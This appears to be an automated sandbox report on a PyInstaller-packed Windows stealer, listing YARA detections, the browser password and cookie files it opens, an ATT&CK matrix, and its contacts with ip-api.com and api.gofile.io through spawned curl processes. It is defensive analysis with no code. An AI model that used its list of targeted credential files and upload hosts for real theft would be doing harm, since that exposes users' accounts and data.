            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\pywin32_system32\pywintypes311.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32\win32api.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32com VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\win32 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\Pythonwin VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI75802 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeQueries volume information: C:\Users\user\Desktop\main.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF73339C5E0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF73339C5E0
            Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF7333B6E70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7333B6E70

            Stealing of Sensitive Information

            barindex
            Yara detected Discord Token Stealer
            Source: Yara matchFile source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR
            Yara detected PRYSMAX STEALER
            Source: Yara matchFile source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BookmarksJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\local Storage\leveldb\000003.logJump to behavior
            Source: C:\Users\user\Desktop\main.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Yara detected Generic Python Stealer
            Source: Yara matchFile source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Discord Token Stealer
            Source: Yara matchFile source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR
            Yara detected PRYSMAX STEALER
            Source: Yara matchFile source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000002.00000002.2026526474.000001E895070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR
            Yara detected Generic Python Stealer
            Source: Yara matchFile source: Process Memory Space: main.exe PID: 7680, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		11
            Process Injection            		1
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Process Injection            		LSASS Memory31
            Security Software Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Native API            		Logon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture3
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579350 Sample: main.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 92 49 ip-api.com 2->49 51 api.gofile.io 2->51 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 Yara detected PRYSMAX STEALER 2->61 63 3 other signatures 2->63 9 main.exe 151 2->9         started        signatures3 process4 file5 41 C:\Users\...\backend_c.cp311-win_amd64.pyd, PE32+ 9->41 dropped 43 C:\Users\user\...\_cffi.cp311-win_amd64.pyd, PE32+ 9->43 dropped 45 C:\Users\user\AppData\Local\...\shell.pyd, PE32+ 9->45 dropped 47 88 other files (none is malicious) 9->47 dropped 65 Found pyInstaller with non standard icon 9->65 13 main.exe 24 9->13         started        17 conhost.exe 9->17         started        signatures6 process7 dnsIp8 53 ip-api.com 208.95.112.1, 49732, 49733, 80 TUT-ASUS United States 13->53 55 api.gofile.io 45.112.123.126, 443, 49731, 49736 AMAZON-02US Singapore 13->55 67 Tries to harvest and steal browser information (history, passwords, etc) 13->67 19 cmd.exe 1 13->19         started        21 cmd.exe 1 13->21         started        23 cmd.exe 1 13->23         started        25 8 other processes 13->25 signatures9 process10 process11 27 WMIC.exe 1 19->27         started        29 curl.exe 1 21->29         started        31 curl.exe 1 23->31         started        33 curl.exe 1 25->33         started        35 curl.exe 1 25->35         started        37 curl.exe 1 25->37         started        39 curl.exe 1 25->39         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            main.exe16%ReversingLabsWin64.Trojan.ReverseShell
            main.exe24%VirustotalBrowse
            main.exe100%AviraOSX/GM.ReverseShe.TH

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_ARC4.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_Salsa20.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_chacha20.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_pkcs1_decode.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aes.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_aesni.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_arc2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_blowfish.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cast.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cbc.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_cfb.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ctr.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_des3.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ecb.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_eksblowfish.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ocb.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Cipher\_raw_ofb.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2b.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_BLAKE2s.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD2.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD4.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_MD5.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_RIPEMD160.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA1.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA224.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA256.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA384.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_SHA512.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_clmul.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_ghash_portable.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_keccak.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Hash\_poly1305.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Math\_modexp.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Protocol\_scrypt.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve25519.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_curve448.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ec_ws.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed25519.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\PublicKey\_ed448.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_cpuid_c.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\Crypto\Util\_strxor.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imaging.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingcms.cp311-win_amd64.pyd0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\_MEI75802\PIL\_imagingmath.cp311-win_amd64.pyd0%ReversingLabs
